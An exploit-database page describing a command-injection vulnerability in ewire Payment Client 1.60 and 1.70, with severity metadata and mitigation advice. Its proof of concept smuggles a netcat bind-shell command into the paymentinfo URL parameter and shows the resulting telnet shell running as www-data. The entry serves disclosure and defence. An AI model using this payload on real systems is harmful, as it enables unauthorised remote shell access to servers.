Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Arbitrary Command Execution in ewire Payment Client - exploit.company
header-logo
Suggest Exploit
vendor:
Payment Client
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: Payment Client
Affected Version From: 1.6
Affected Version To: 1.7
Patch Exists: NO
Related CWE: None mentioned
CPE: a:ewire:payment_client:1.60 cpe:/a:ewire:payment_client:1.70
Metasploit:
Other Scripts:
Platforms Tested: None mentioned
Unknown

Arbitrary Command Execution in ewire Payment Client

The ewire Payment Client is vulnerable to an arbitrary command execution vulnerability. Attackers can exploit this vulnerability by injecting malicious input, which is not properly sanitized by the software. This allows the attacker to execute arbitrary shell commands on the affected computer, with the privileges of the application using the affected class utility.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied input properly before using it in commands. Additionally, regular software updates and patches should be applied to ensure the latest security fixes are in place.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25683/info

ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.

ewire Payment Client 1.60 and 1.70 are vulnerable to this issue. 

GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin
fo=`/bin/nc -l -p6666 -e /bin/bash`
$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigation

Suggest Exploit

Services By CQR